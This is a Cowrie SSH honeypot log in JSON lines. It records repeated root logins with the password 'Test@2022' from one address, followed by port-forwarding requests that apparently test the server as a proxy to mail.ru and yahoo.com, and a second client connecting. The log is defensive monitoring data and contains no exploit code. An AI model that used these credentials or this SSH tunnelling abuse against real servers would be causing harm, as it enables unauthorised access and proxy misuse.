{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":9164,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:9164","sensor":"my-vps","timestamp":"2025-08-31T03:49:43.076019Z","session":"c28f9324b823"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:43.125717Z","src_ip":"77.83.207.83","session":"c28f9324b823"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":11596,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:11596","sensor":"my-vps","timestamp":"2025-08-31T03:49:43.267998Z","session":"c28f9324b823"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:43.317829Z","src_ip":"77.83.207.83","session":"c28f9324b823"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":19017,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:19017","sensor":"my-vps","timestamp":"2025-08-31T03:49:43.460122Z","session":"c28f9324b823"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:43.509896Z","src_ip":"77.83.207.83","session":"c28f9324b823"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:43.561060Z","src_ip":"77.83.207.83","session":"c28f9324b823"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":11064,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e18cbab3972","protocol":"ssh","message":"New connection: 77.83.207.83:11064 (1.2.3.4:22) [session: 5e18cbab3972]","sensor":"my-vps","timestamp":"2025-08-31T03:49:43.611447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:43.612405Z","src_ip":"77.83.207.83","session":"5e18cbab3972"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:43.663077Z","src_ip":"77.83.207.83","session":"5e18cbab3972"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:43.916759Z","src_ip":"77.83.207.83","session":"5e18cbab3972"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4880,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:4880","sensor":"my-vps","timestamp":"2025-08-31T03:49:43.968676Z","session":"5e18cbab3972"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:44.019868Z","src_ip":"77.83.207.83","session":"5e18cbab3972"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":18790,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:18790","sensor":"my-vps","timestamp":"2025-08-31T03:49:44.165381Z","session":"5e18cbab3972"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:44.216361Z","src_ip":"77.83.207.83","session":"5e18cbab3972"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":31979,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:31979","sensor":"my-vps","timestamp":"2025-08-31T03:49:44.361364Z","session":"5e18cbab3972"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:44.412337Z","src_ip":"77.83.207.83","session":"5e18cbab3972"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:44.464172Z","src_ip":"77.83.207.83","session":"5e18cbab3972"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":11164,"dst_ip":"1.2.3.4","dst_port":22,"session":"b625e67d5a43","protocol":"ssh","message":"New connection: 77.83.207.83:11164 (1.2.3.4:22) [session: b625e67d5a43]","sensor":"my-vps","timestamp":"2025-08-31T03:49:44.513749Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:44.524101Z","src_ip":"77.83.207.83","session":"b625e67d5a43"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:44.564714Z","src_ip":"77.83.207.83","session":"b625e67d5a43"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:44.816522Z","src_ip":"77.83.207.83","session":"b625e67d5a43"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":6040,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:6040","sensor":"my-vps","timestamp":"2025-08-31T03:49:44.867733Z","session":"b625e67d5a43"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:44.918227Z","src_ip":"77.83.207.83","session":"b625e67d5a43"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":15128,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:15128","sensor":"my-vps","timestamp":"2025-08-31T03:49:45.060979Z","session":"b625e67d5a43"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:45.111478Z","src_ip":"77.83.207.83","session":"b625e67d5a43"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49824,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fc049fd5486","protocol":"ssh","message":"New connection: 212.227.235.229:49824 (1.2.3.4:22) [session: 6fc049fd5486]","sensor":"my-vps","timestamp":"2025-08-31T03:49:45.183131Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":24085,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:24085","sensor":"my-vps","timestamp":"2025-08-31T03:49:45.256920Z","session":"b625e67d5a43"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:45.307457Z","src_ip":"77.83.207.83","session":"b625e67d5a43"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:45.358920Z","src_ip":"77.83.207.83","session":"b625e67d5a43"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":11236,"dst_ip":"1.2.3.4","dst_port":22,"session":"e055e7f36f01","protocol":"ssh","message":"New connection: 77.83.207.83:11236 (1.2.3.4:22) [session: e055e7f36f01]","sensor":"my-vps","timestamp":"2025-08-31T03:49:45.407996Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:45.408671Z","src_ip":"77.83.207.83","session":"e055e7f36f01"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:45.459126Z","src_ip":"77.83.207.83","session":"e055e7f36f01"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:45.709638Z","src_ip":"77.83.207.83","session":"e055e7f36f01"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":20647,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:20647","sensor":"my-vps","timestamp":"2025-08-31T03:49:45.761478Z","session":"e055e7f36f01"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:45.811905Z","src_ip":"77.83.207.83","session":"e055e7f36f01"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:49:45.906434Z","src_ip":"212.227.235.229","session":"6fc049fd5486"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:49:45.907353Z","src_ip":"212.227.235.229","session":"6fc049fd5486"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":18827,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:18827","sensor":"my-vps","timestamp":"2025-08-31T03:49:45.952661Z","session":"e055e7f36f01"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:46.003001Z","src_ip":"77.83.207.83","session":"e055e7f36f01"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":27087,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:27087","sensor":"my-vps","timestamp":"2025-08-31T03:49:46.144651Z","session":"e055e7f36f01"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:46.195050Z","src_ip":"77.83.207.83","session":"e055e7f36f01"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:46.246639Z","src_ip":"77.83.207.83","session":"e055e7f36f01"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":11325,"dst_ip":"1.2.3.4","dst_port":22,"session":"c30d948e4489","protocol":"ssh","message":"New connection: 77.83.207.83:11325 (1.2.3.4:22) [session: c30d948e4489]","sensor":"my-vps","timestamp":"2025-08-31T03:49:46.295005Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:46.305845Z","src_ip":"77.83.207.83","session":"c30d948e4489"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:46.345119Z","src_ip":"77.83.207.83","session":"c30d948e4489"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:46.594321Z","src_ip":"77.83.207.83","session":"c30d948e4489"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":21265,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:21265","sensor":"my-vps","timestamp":"2025-08-31T03:49:46.645455Z","session":"c30d948e4489"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:46.695513Z","src_ip":"77.83.207.83","session":"c30d948e4489"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":3205,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:3205","sensor":"my-vps","timestamp":"2025-08-31T03:49:46.836185Z","session":"c30d948e4489"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:46.886192Z","src_ip":"77.83.207.83","session":"c30d948e4489"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":5470,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:5470","sensor":"my-vps","timestamp":"2025-08-31T03:49:47.028405Z","session":"c30d948e4489"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:47.078716Z","src_ip":"77.83.207.83","session":"c30d948e4489"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:47.129317Z","src_ip":"77.83.207.83","session":"c30d948e4489"}
